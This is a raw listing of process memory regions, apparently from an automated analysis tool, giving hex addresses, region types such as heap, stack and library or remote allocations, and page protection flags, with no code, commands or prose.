3BEB0000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
7FFAABA32000
trusted library allocation
page read and write
3BD6E000
stack
page read and write
296B0000
trusted library allocation
page read and write
1A2C41BB000
heap
page read and write
4140D000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
41560000
trusted library allocation
page read and write
3DCFF000
stack
page read and write
41440000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
1A2C419A000
heap
page read and write
40BC0000
trusted library allocation
page read and write
3BE60000
heap
page read and write
44B000
remote allocation
page execute and read and write
1A2C41AB000
heap
page read and write
41440000
trusted library allocation
page read and write
C2F34BF000
stack
page read and write
1A2C419A000
heap
page read and write
1A2C46D7000
heap
page read and write
1A2C41A2000
heap
page read and write
41D60000
trusted library allocation
page read and write
7FFAAB8E0000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
3BDF6000
heap
page read and write
41D70000
trusted library allocation
page read and write
1A2C4377000
heap
page read and write
2B010001000
trusted library allocation
page read and write
74E000
stack
page read and write
1A2C46CB000
heap
page read and write
1A2C41A0000
heap
page read and write
13C81000
direct allocation
page read and write
4132D000
heap
page read and write
4F0000
remote allocation
page execute and read and write
296C0000
trusted library allocation
page read and write
28510000
trusted library allocation
page read and write
1A2C9850000
trusted library allocation
page read and write
459000
unkown
page write copy
3D967000
heap
page read and write
29FE0000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
3D893000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
1A2C35C0000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
1A2C4391000
heap
page read and write
41460000
trusted library allocation
page read and write
28E19000
trusted library allocation
page read and write
418DF000
stack
page read and write
29E326B0000
heap
page read and write
1A2C41A0000
heap
page read and write
296C0000
trusted library allocation
page read and write
57E000
unkown
page readonly
40B5E000
trusted library allocation
page read and write
1A2C4366000
heap
page read and write
7F0E4000
direct allocation
page read and write
24D0000
heap
page read and write
1A2C419C000
heap
page read and write
41570000
trusted library allocation
page read and write
24083000
heap
page read and write
C2F3639000
stack
page read and write
414B0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
29FE0000
trusted library allocation
page read and write
7FFAAB854000
trusted library allocation
page read and write
142BF000
stack
page read and write
41560000
trusted library allocation
page read and write
41420000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
25B04000
trusted library allocation
page read and write
28522000
trusted library allocation
page read and write
41293000
heap
page read and write
3DBBC000
stack
page read and write
24055000
heap
page read and write
3340000
heap
page read and write
29E1BF5A000
trusted library allocation
page read and write
28E60000
trusted library allocation
page read and write
29E1A051000
trusted library allocation
page read and write
41C40000
trusted library allocation
page read and write
1A2C48C3000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
14EAE000
heap
page read and write
D936D7F000
stack
page read and write
1A2C41B1000
heap
page read and write
25AD0000
trusted library section
page read and write
41560000
trusted library allocation
page read and write
2957E000
stack
page read and write
4161E000
unkown
page read and write
40BB0000
trusted library allocation
page read and write
297E0000
trusted library allocation
page read and write
13C7A000
direct allocation
page read and write
2B07A0E3000
heap
page read and write
314AC7C000
stack
page read and write
1A2C98D3000
trusted library allocation
page read and write
1A2C4188000
heap
page read and write
2900000
direct allocation
page read and write
41460000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
7E0000
unkown
page execute and read and write
3DE3A000
trusted library allocation
page read and write
7FFB05F55000
unkown
page readonly
29680000
trusted library allocation
page read and write
2906F000
stack
page read and write
21C346B0000
trusted library section
page readonly
21C33878000
heap
page read and write
19C000
stack
page read and write
297E0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
3D920000
heap
page read and write
145DE000
stack
page read and write
1A2C41AA000
heap
page read and write
1A2C4391000
heap
page read and write
7FFAAB85D000
trusted library allocation
page execute and read and write
7FFAABA0A000
trusted library allocation
page read and write
411AC000
stack
page read and write
1A2C4364000
heap
page read and write
3BE90000
heap
page read and write
314A477000
stack
page read and write
296C7000
trusted library allocation
page read and write
416000
unkown
page readonly
41398000
heap
page read and write
1A2C4749000
heap
page read and write
1A2C46D6000
heap
page read and write
40DEF000
stack
page read and write
29E323B0000
heap
page read and write
21EC000
direct allocation
page read and write
1A2C41B1000
heap
page read and write
1A2C419A000
heap
page read and write
414C0000
trusted library allocation
page read and write
7F0C0000
direct allocation
page read and write
1A2C46D6000
heap
page read and write
296E0000
trusted library allocation
page read and write
3DDA0000
trusted library allocation
page read and write
3DD89000
trusted library allocation
page read and write
29730000
trusted library allocation
page read and write
40A20000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
41A30000
remote allocation
page read and write
21C38D50000
trusted library allocation
page read and write
41490000
trusted library allocation
page read and write
1A2C9976000
trusted library allocation
page read and write
3D940000
trusted library allocation
page execute and read and write
29E18293000
heap
page read and write
1A2C9890000
trusted library allocation
page read and write
400000
unkown
page readonly
1A2C41A1000
heap
page read and write
7FFAAB84B000
trusted library allocation
page read and write
1A2C4368000
heap
page read and write
2402000
direct allocation
page read and write
29E182AB000
heap
page read and write
1A2C41A2000
heap
page read and write
41570000
trusted library allocation
page read and write
1A2C3644000
trusted library allocation
page read and write
1A2C41BF000
heap
page read and write
1A2C4730000
heap
page read and write
1A2C41A0000
heap
page read and write
21C38EDF000
heap
page read and write
29E18220000
heap
page read and write
41431000
trusted library allocation
page read and write
314AFFE000
stack
page read and write
1A2C419C000
heap
page read and write
29E19CD0000
trusted library allocation
page read and write
1A2C3930000
heap
page read and write
243C000
direct allocation
page read and write
21C38EF7000
heap
page read and write
426000
remote allocation
page execute and read and write
41315000
heap
page read and write
296E0000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
2380000
direct allocation
page execute and read and write
3C0AF000
stack
page read and write
3BDD7000
heap
page read and write
1A2C41A1000
heap
page read and write
314B0FE000
stack
page read and write
3DE6A000
trusted library allocation
page read and write
7F110000
direct allocation
page read and write
411D9000
heap
page read and write
401000
unkown
page execute read
297F0000
trusted library allocation
page read and write
8D0000
remote allocation
page execute and read and write
25B40000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
41440000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
1A2C46CC000
heap
page read and write
19AC1772000
heap
page read and write
1A2C3940000
trusted library allocation
page read and write
6EC5F000
unkown
page readonly
414D0000
trusted library allocation
page read and write
29E32432000
heap
page read and write
1A2C41B1000
heap
page read and write
40D000
unkown
page write copy
28D00000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
29B0000
heap
page read and write
21C38CC0000
trusted library allocation
page read and write
41410000
trusted library allocation
page read and write
C2F383C000
stack
page read and write
19AC1766000
heap
page read and write
19AC18ED000
heap
page read and write
1A2C41AB000
heap
page read and write
13BD8000
direct allocation
page read and write
29750000
trusted library allocation
page read and write
7FFAABA40000
trusted library allocation
page execute and read and write
418E0000
heap
page read and write
1A2C438D000
heap
page read and write
1A2C46E1000
heap
page read and write
3D880000
trusted library allocation
page read and write
19AC1757000
heap
page read and write
7FFAABC10000
trusted library allocation
page read and write
24065000
heap
page read and write
41C30000
trusted library allocation
page read and write
C2F30FE000
unkown
page read and write
7F1B0000
direct allocation
page read and write
28E8D000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
7FDF0000
trusted library allocation
page execute and read and write
29E19C80000
trusted library allocation
page read and write
40B30000
trusted library allocation
page read and write
29E1C201000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
297E0000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
B3C000
stack
page read and write
3080000
heap
page read and write
7126B4E000
stack
page read and write
1A2C4341000
heap
page read and write
7EB60000
direct allocation
page read and write
314BB7E000
unkown
page readonly
1A2C42EC000
heap
page read and write
41560000
trusted library allocation
page read and write
25DF000
direct allocation
page read and write
314B47E000
unkown
page readonly
40AA0000
trusted library allocation
page read and write
D936CFE000
stack
page read and write
28E20000
trusted library allocation
page read and write
29E32732000
heap
page read and write
3BDB8000
heap
page read and write
41DC0000
trusted library allocation
page read and write
71266DF000
stack
page read and write
21C34113000
heap
page read and write
7FFAAB90C000
trusted library allocation
page execute and read and write
3BEC3000
trusted library allocation
page execute and read and write
28DD0000
trusted library allocation
page read and write
1A2C41A9000
heap
page read and write
29FE0000
trusted library allocation
page read and write
21C337D0000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
1A2C419A000
heap
page read and write
29E18258000
heap
page read and write
7FBF0000
direct allocation
page read and write
14B20000
heap
page read and write
2950E000
heap
page read and write
41440000
trusted library allocation
page read and write
29730000
trusted library allocation
page read and write
41D60000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
40B20000
trusted library allocation
page read and write
3BE3D000
heap
page read and write
2201000
direct allocation
page read and write
3D8A0000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
29E1A557000
trusted library allocation
page read and write
7FFAABB10000
trusted library allocation
page read and write
29730000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
1A2C41B1000
heap
page read and write
13B3F000
direct allocation
page read and write
28CB0000
trusted library allocation
page read and write
2999E000
stack
page read and write
1A2C41B1000
heap
page read and write
3BE1A000
heap
page read and write
1A2C419A000
heap
page read and write
13C6C000
stack
page read and write
1A2C41A2000
heap
page read and write
7FFAABAB0000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
8D0000
unkown
page execute and read and write
1A2C41B1000
heap
page read and write
29700000
trusted library allocation
page read and write
4161E000
unkown
page read and write
3DDA7000
trusted library allocation
page read and write
3BDCB000
heap
page read and write
41478000
trusted library allocation
page read and write
2B07A3E0000
heap
page read and write
21E4000
direct allocation
page read and write
7FFAABA80000
trusted library allocation
page read and write
314B77E000
stack
page read and write
62E000
heap
page read and write
2B07A330000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
D936E3F000
stack
page read and write
28E10000
trusted library allocation
page read and write
414C0000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
2461000
direct allocation
page read and write
1A2C419C000
heap
page read and write
2B07C250000
heap
page execute and read and write
1A2C41A2000
heap
page read and write
7F970000
direct allocation
page read and write
29E32490000
heap
page read and write
296C0000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
1A2C419A000
heap
page read and write
7EC30000
direct allocation
page read and write
7FFAABB30000
trusted library allocation
page read and write
461F000
stack
page read and write
1A2C4717000
heap
page read and write
1A2C41AA000
heap
page read and write
41D80000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
1A2C46DD000
heap
page read and write
40A80000
trusted library allocation
page read and write
297E0000
trusted library allocation
page read and write
21C34540000
trusted library allocation
page read and write
21C38CA0000
trusted library allocation
page read and write
7F0C0000
direct allocation
page read and write
4140D000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
41440000
trusted library allocation
page read and write
28E90000
trusted library allocation
page read and write
2B2D000
stack
page read and write
1A2C4155000
heap
page read and write
29E32730000
heap
page read and write
459000
unkown
page read and write
1A2C41BA000
heap
page read and write
41410000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
1A2C419A000
heap
page read and write
296B0000
trusted library allocation
page read and write
314BC7B000
stack
page read and write
5DE000
heap
page read and write
41D70000
trusted library allocation
page read and write
24069000
heap
page read and write
40A50000
trusted library allocation
page read and write
13DDE000
stack
page read and write
1A2C419A000
heap
page read and write
4040F000
stack
page read and write
2B07C17B000
heap
page read and write
29E1BF8A000
trusted library allocation
page read and write
21C3411A000
heap
page read and write
29AB000
direct allocation
page read and write
297E0000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
23FA0000
heap
page read and write
21C38DD0000
trusted library allocation
page read and write
2B001794000
trusted library allocation
page read and write
21C336C0000
heap
page read and write
25B3A000
trusted library allocation
page execute and read and write
1A2C41AB000
heap
page read and write
2409000
direct allocation
page read and write
3D8BB000
trusted library allocation
page execute and read and write
29E323A0000
heap
page read and write
24060000
heap
page read and write
41430000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
1A2C4326000
heap
page read and write
1A2C9977000
trusted library allocation
page read and write
3BE5A000
heap
page read and write
AC0000
heap
page read and write
41460000
trusted library allocation
page read and write
1F0000
heap
page read and write
41372000
heap
page read and write
6EC5D000
unkown
page read and write
1A2C41CF000
heap
page read and write
3CC000
stack
page read and write
7FFAABA70000
trusted library allocation
page read and write
1A2C9890000
trusted library allocation
page execute
41560000
trusted library allocation
page read and write
297E0000
trusted library allocation
page read and write
2B07C270000
heap
page read and write
6EC40000
unkown
page readonly
1A2C435E000
heap
page read and write
1A2C41A1000
heap
page read and write
1A2C4377000
heap
page read and write
314AB7E000
unkown
page readonly
1A2C419C000
heap
page read and write
1A2C419A000
heap
page read and write
3BE38000
heap
page read and write
25B60000
trusted library allocation
page read and write
1A2C4175000
heap
page read and write
1A2C41A1000
heap
page read and write
7EBE0000
direct allocation
page read and write
24E0000
direct allocation
page read and write
1A2C42ED000
heap
page read and write
41560000
trusted library allocation
page read and write
327F000
unkown
page read and write
1A2C41B1000
heap
page read and write
40AF0000
trusted library allocation
page read and write
7FFAABA60000
trusted library allocation
page read and write
3BE30000
heap
page read and write
414B0000
trusted library allocation
page read and write
40CEE000
stack
page read and write
1A2C41B1000
heap
page read and write
25B45000
trusted library allocation
page execute and read and write
25C60000
heap
page read and write
3DE58000
trusted library allocation
page read and write
40A30000
trusted library allocation
page read and write
3EEB0000
trusted library allocation
page read and write
770000
heap
page read and write
2B07BD50000
heap
page read and write
28DC000
direct allocation
page read and write
3DD7F000
trusted library allocation
page read and write
40BB0000
trusted library allocation
page read and write
7FFAABBA0000
trusted library allocation
page read and write
7F970000
direct allocation
page read and write
7F0B0000
direct allocation
page read and write
3BDF4000
heap
page read and write
40A90000
trusted library allocation
page read and write
1A2C4303000
heap
page read and write
241BE000
stack
page read and write
1A2C46C0000
heap
page read and write
1A2C4191000
heap
page read and write
21C34015000
heap
page read and write
1A2C418F000
heap
page read and write
296C0000
trusted library allocation
page read and write
1A2C4305000
heap
page read and write
21C38DB0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
7FFAABC20000
trusted library allocation
page read and write
19AC170D000
heap
page read and write
314B57E000
unkown
page readonly
C2F430D000
stack
page read and write
2B010082000
trusted library allocation
page read and write
41D60000
trusted library allocation
page read and write
4171E000
stack
page read and write
1A2C41AB000
heap
page read and write
1A2C4711000
heap
page read and write
1A2C4980000
trusted library allocation
page read and write
21C38F0A000
heap
page read and write
41440000
trusted library allocation
page read and write
3BE31000
heap
page read and write
C2F428E000
stack
page read and write
7FFAABB10000
trusted library allocation
page read and write
389000
stack
page read and write
1A2C9890000
heap
page read and write
40C8C000
stack
page read and write
14590000
remote allocation
page read and write
28E30000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
297E0000
trusted library allocation
page read and write
7126C4E000
stack
page read and write
2B07C257000
heap
page execute and read and write
7FFAABB80000
trusted library allocation
page read and write
7FFAAB9E1000
trusted library allocation
page read and write
3DE30000
trusted library allocation
page read and write
3D920000
heap
page execute and read and write
3D89D000
trusted library allocation
page execute and read and write
29740000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
2408E000
heap
page read and write
3D8B0000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
7FFAAB88C000
trusted library allocation
page execute and read and write
1A2C419A000
heap
page read and write
1A2C46DA000
heap
page read and write
3BE50000
heap
page read and write
2853D000
trusted library allocation
page read and write
7FFAABAD0000
trusted library allocation
page read and write
1A2C35E9000
trusted library allocation
page read and write
3BEC4000
trusted library allocation
page read and write
1415F000
stack
page read and write
41460000
trusted library allocation
page read and write
29FE0000
trusted library allocation
page read and write
29C0000
heap
page read and write
7FFAABA00000
trusted library allocation
page execute and read and write
459000
unkown
page read and write
D936B7E000
stack
page read and write
A60000
heap
page read and write
7FDA7000
direct allocation
page read and write
3DDB9000
trusted library allocation
page read and write
402ED000
trusted library allocation
page read and write
40B5E000
trusted library allocation
page read and write
14590000
remote allocation
page read and write
7FFAAB906000
trusted library allocation
page read and write
28DF0000
trusted library allocation
page read and write
7FC10000
direct allocation
page read and write
29E326E2000
heap
page read and write
1A2C9973000
trusted library allocation
page read and write
21B2000
direct allocation
page read and write
21C346A0000
trusted library section
page readonly
4106F000
stack
page read and write
3EE00000
trusted library allocation
page read and write
411B0000
trusted library allocation
page execute and read and write
7FFAABA90000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
41560000
trusted library allocation
page read and write
296F8000
trusted library allocation
page read and write
23F0000
heap
page read and write
7F0C0000
direct allocation
page read and write
314B87E000
unkown
page readonly
41430000
trusted library allocation
page read and write
1A2C436A000
heap
page read and write
2B000E37000
trusted library allocation
page read and write
3BE1D000
heap
page read and write
21C33902000
heap
page read and write
2851B000
trusted library allocation
page read and write
7FFAAB916000
trusted library allocation
page execute and read and write
1A2C41B1000
heap
page read and write
41A30000
remote allocation
page read and write
7FFAABAD0000
trusted library allocation
page read and write
233F000
stack
page read and write
219F000
direct allocation
page read and write
402E1000
trusted library allocation
page read and write
7EEDF000
direct allocation
page read and write
2B07C3BD000
heap
page read and write
1A2C419C000
heap
page read and write
19C000
stack
page read and write
142BF000
stack
page read and write
41410000
trusted library allocation
page read and write
7F110000
direct allocation
page read and write
29EB0000
trusted library allocation
page read and write
1A2C35E0000
trusted library allocation
page read and write
7F0B0000
direct allocation
page read and write
24054000
heap
page read and write
4175E000
stack
page read and write
41D60000
trusted library allocation
page execute and read and write
1A2C419A000
heap
page read and write
25BE7000
heap
page read and write
1A2C3934000
heap
page read and write
40A30000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
244C000
direct allocation
page read and write
3BE60000
heap
page read and write
41DD0000
trusted library allocation
page read and write
41DE0000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
13C88000
direct allocation
page read and write
41C30000
trusted library allocation
page read and write
414B0000
trusted library allocation
page read and write
21C38CB0000
trusted library allocation
page read and write
2A020000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
40B30000
trusted library allocation
page read and write
41D80000
trusted library allocation
page read and write
19AC174B000
heap
page read and write
7FB80000
direct allocation
page read and write
41A30000
remote allocation
page read and write
3DD2F000
stack
page read and write
41440000
trusted library allocation
page read and write
29E19E50000
heap
page read and write
21C38EC0000
heap
page read and write
41C30000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
13EBF000
stack
page read and write
29E32767000
heap
page read and write
296D0000
trusted library allocation
page read and write
40B70000
trusted library allocation
page read and write
29E1CB19000
trusted library allocation
page read and write
21C34102000
heap
page read and write
1A2C46D3000
heap
page read and write
25B4B000
trusted library allocation
page execute and read and write
297F0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
21C39020000
remote allocation
page read and write
41560000
trusted library allocation
page read and write
1A2C4730000
heap
page read and write
21C3415B000
heap
page read and write
2B07A17F000
heap
page read and write
40C05000
trusted library allocation
page read and write
1A2C41A0000
heap
page read and write
41450000
trusted library allocation
page read and write
25D0000
direct allocation
page read and write
1A2C419A000
heap
page read and write
3BFEE000
stack
page read and write
785000
heap
page read and write
2408000
direct allocation
page read and write
7E0000
remote allocation
page execute and read and write
41430000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
2989E000
unkown
page read and write
2B07A0DE000
heap
page read and write
28DDE000
trusted library allocation
page read and write
7FFAAB853000
trusted library allocation
page execute and read and write
40BF0000
trusted library allocation
page read and write
28DF0000
trusted library allocation
page read and write
41570000
trusted library allocation
page read and write
414B0000
trusted library allocation
page read and write
29E1CC05000
trusted library allocation
page read and write
8A0000
remote allocation
page execute and read and write
41430000
trusted library allocation
page read and write
41D90000
trusted library allocation
page read and write
41B7F000
stack
page read and write
3BE2B000
heap
page read and write
2B07A197000
heap
page read and write
29E19C60000
trusted library allocation
page read and write
40C0D000
trusted library allocation
page read and write
40B70000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
296B0000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
6EC41000
unkown
page execute read
97000
stack
page read and write
1A2C4346000
heap
page read and write
4096B000
trusted library allocation
page read and write
1A2C41A6000
heap
page read and write
21C338B3000
heap
page read and write
40AE0000
trusted library allocation
page read and write
1A2C4722000
heap
page read and write
296BB000
trusted library allocation
page read and write
314AA79000
stack
page read and write
C2F317E000
stack
page read and write
1A2C42F6000
heap
page read and write
1A2C4356000
heap
page read and write
296C0000
trusted library allocation
page read and write
415DF000
unkown
page read and write
28E00000
trusted library allocation
page read and write
28D20000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
1A2C41A0000
heap
page read and write
7FFAABBB0000
trusted library allocation
page read and write
2630000
heap
page read and write
2B07C11F000
heap
page read and write
41D90000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
7FFAABA20000
trusted library allocation
page execute and read and write
19AC19B6000
heap
page read and write
1A2C41A2000
heap
page read and write
402E6000
trusted library allocation
page read and write
2451000
direct allocation
page read and write
3BDDE000
heap
page read and write
40CEE000
stack
page read and write
1A2C4331000
heap
page read and write
1A2C4364000
heap
page read and write
19AC1739000
heap
page read and write
29E1A0D5000
trusted library allocation
page read and write
D937B8E000
stack
page read and write
7F970000
direct allocation
page read and write
41560000
trusted library allocation
page read and write
1A2C4175000
heap
page read and write
5EE000
stack
page read and write
24054000
heap
page read and write
28F6E000
stack
page read and write
28E40000
trusted library allocation
page read and write
296D0000
trusted library allocation
page read and write
40B50000
trusted library allocation
page read and write
7FFAAB8E6000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
3BED7000
heap
page read and write
297D0000
trusted library allocation
page read and write
7EB90000
direct allocation
page read and write
21C38C70000
trusted library allocation
page read and write
29E1BDFD000
trusted library allocation
page read and write
29E18420000
heap
page read and write
411B0000
trusted library allocation
page execute and read and write
41460000
trusted library allocation
page read and write
2B07BD54000
heap
page read and write
6EC5D000
unkown
page read and write
1A2C41AB000
heap
page read and write
40AD0000
trusted library allocation
page read and write
297E4000
trusted library allocation
page read and write
2395000
direct allocation
page read and write
1A2C435F000
heap
page read and write
97000
stack
page read and write
21C38F02000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C41AB000
heap
page read and write
7EB36000
direct allocation
page read and write
40A90000
trusted library allocation
page read and write
314A97E000
unkown
page readonly
41400000
trusted library allocation
page read and write
D93713E000
stack
page read and write
29E2A051000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
21C38C80000
trusted library allocation
page read and write
25FDA000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
1A2C419A000
heap
page read and write
25B30000
trusted library allocation
page read and write
19AC1890000
heap
page read and write
1A2C41B1000
heap
page read and write
40BE0000
trusted library allocation
page read and write
570000
unkown
page read and write
1A2C41A1000
heap
page read and write
2B07A080000
heap
page read and write
40B80000
trusted library allocation
page read and write
2A000000
trusted library allocation
page read and write
146DF000
stack
page read and write
19AC19B4000
heap
page read and write
296E0000
trusted library allocation
page read and write
28DB0000
trusted library allocation
page read and write
3BE01000
heap
page read and write
41440000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
1A2C42A3000
heap
page read and write
1A2C4368000
heap
page read and write
41440000
trusted library allocation
page read and write
1444E000
stack
page read and write
AC3000
heap
page read and write
41560000
trusted library allocation
page read and write
2B000089000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
415DF000
unkown
page read and write
24074000
heap
page read and write
2B010076000
trusted library allocation
page read and write
40A50000
heap
page read and write
29720000
trusted library allocation
page read and write
1430E000
stack
page read and write
29E19CDB000
trusted library allocation
page read and write
6C5000
heap
page read and write
25AC0000
trusted library section
page read and write
29E1C0A4000
trusted library allocation
page read and write
40DEF000
stack
page read and write
1A2C439E000
heap
page read and write
1A2C46DE000
heap
page read and write
1A2C41AB000
heap
page read and write
3DC10000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
41450000
trusted library allocation
page read and write
41393000
heap
page read and write
29EC0000
trusted library allocation
page read and write
21C38EF2000
heap
page read and write
40C20000
trusted library allocation
page read and write
40C10000
trusted library allocation
page read and write
3D810000
trusted library section
page read and write
297E0000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
D9367C3000
stack
page read and write
29E1A548000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
2B000429000
trusted library allocation
page read and write
402CE000
trusted library allocation
page read and write
28DE0000
trusted library allocation
page read and write
40C30000
trusted library allocation
page read and write
3D8AA000
trusted library allocation
page execute and read and write
2890000
direct allocation
page read and write
3D884000
trusted library allocation
page read and write
6EC5F000
unkown
page readonly
23FA8000
heap
page read and write
1A2C41BA000
heap
page read and write
1440E000
stack
page read and write
2B07C0B6000
heap
page read and write
7FFAAB9F0000
trusted library allocation
page read and write
1A2C41AA000
heap
page read and write
1A2C41B1000
heap
page read and write
28D40000
trusted library allocation
page read and write
296B0000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
25D8000
direct allocation
page read and write
1A2C42A0000
remote allocation
page read and write
3D8A6000
trusted library allocation
page execute and read and write
40C05000
trusted library allocation
page read and write
41441000
trusted library allocation
page read and write
44B000
remote allocation
page execute and read and write
29E1A30E000
trusted library allocation
page read and write
29E185F4000
heap
page read and write
7FFB05F30000
unkown
page readonly
28DA0000
trusted library allocation
page read and write
29E19C10000
heap
page read and write
1A2C41B1000
heap
page read and write
29E1C363000
trusted library allocation
page read and write
7EC30000
direct allocation
page read and write
21C34100000
heap
page read and write
41439000
trusted library allocation
page read and write
41720000
heap
page read and write
1430E000
stack
page read and write
1A2C4309000
heap
page read and write
29680000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
29E32422000
heap
page read and write
29690000
trusted library allocation
page read and write
1A2C4362000
heap
page read and write
1A2C41AB000
heap
page read and write
6BE000
stack
page read and write
9A000
stack
page read and write
41550000
trusted library allocation
page read and write
28D30000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
41410000
trusted library allocation
page read and write
41DC0000
trusted library allocation
page read and write
1A2C4364000
heap
page read and write
29E1C0B6000
trusted library allocation
page read and write
3D8A2000
trusted library allocation
page read and write
40C10000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
41570000
trusted library allocation
page read and write
1401F000
stack
page read and write
41420000
trusted library allocation
page read and write
1F0000
heap
page read and write
294E2000
heap
page read and write
1415F000
stack
page read and write
2849E000
stack
page read and write
13F1E000
stack
page read and write
3BE2B000
heap
page read and write
1A2C42A0000
remote allocation
page read and write
411C0000
trusted library allocation
page read and write
4F0000
unkown
page execute and read and write
13D8A000
stack
page read and write
29440000
heap
page read and write
411C0000
trusted library allocation
page read and write
1A2C41A0000
heap
page read and write
28D90000
trusted library allocation
page read and write
4124B000
heap
page read and write
72E000
heap
page read and write
41440000
trusted library allocation
page read and write
41490000
trusted library allocation
page read and write
14E67000
direct allocation
page read and write
29E1A541000
trusted library allocation
page read and write
414C0000
trusted library allocation
page read and write
7FFAABC60000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
44B000
unkown
page execute and read and write
29FF0000
heap
page read and write
1A2C4352000
heap
page read and write
1A2C41AB000
heap
page read and write
D936A7E000
stack
page read and write
40C0D000
trusted library allocation
page read and write
290AE000
stack
page read and write
1A2C41B1000
heap
page read and write
297E0000
trusted library allocation
page read and write
3BDFA000
heap
page read and write
7FFAABB20000
trusted library allocation
page read and write
4096E000
trusted library allocation
page read and write
13D6A000
stack
page read and write
40A60000
trusted library allocation
page read and write
C2F3478000
stack
page read and write
3BDB3000
heap
page read and write
21C346D0000
trusted library section
page readonly
6EC56000
unkown
page readonly
41440000
trusted library allocation
page read and write
7FFB05F31000
unkown
page execute read
1A2C41A1000
heap
page read and write
1A2C41B1000
heap
page read and write
29E1C0B3000
trusted library allocation
page read and write
28E00000
trusted library allocation
page read and write
6EC5F000
unkown
page readonly
29FF0000
trusted library allocation
page read and write
414A0000
trusted library allocation
page read and write
29E1C09E000
trusted library allocation
page read and write
41DA0000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
2405A000
heap
page read and write
1A2C419A000
heap
page read and write
240A5000
heap
page read and write
296C1000
trusted library allocation
page read and write
1F0000
heap
page read and write
1A2C419D000
heap
page read and write
19AC1600000
heap
page read and write
41D60000
trusted library allocation
page execute and read and write
28DE0000
trusted library allocation
page read and write
296D0000
trusted library allocation
page execute and read and write
3BDB6000
heap
page read and write
3D8A6000
trusted library allocation
page execute and read and write
2B07C0A0000
heap
page read and write
29E1C08F000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
21C3388E000
heap
page read and write
1A2C419A000
heap
page read and write
1A2C9990000
trusted library allocation
page execute
70E000
stack
page read and write
60A000
heap
page read and write
41460000
trusted library allocation
page read and write
21F3000
direct allocation
page read and write
28E10000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
1A2C4192000
heap
page read and write
242D000
direct allocation
page read and write
3BED0000
heap
page read and write
299A0000
heap
page read and write
21C38C80000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
40A60000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
24084000
heap
page read and write
1A2C419C000
heap
page read and write
1A2C41AB000
heap
page read and write
242C0000
heap
page read and write
7126A4C000
stack
page read and write
1A2C4717000
heap
page read and write
28560000
trusted library allocation
page read and write
2B0101B8000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
40C20000
trusted library allocation
page read and write
13BAF000
direct allocation
page read and write
AB0000
heap
page read and write
2B07C158000
heap
page read and write
14590000
remote allocation
page read and write
29DFF000
stack
page read and write
3BE3B000
heap
page read and write
29E32690000
heap
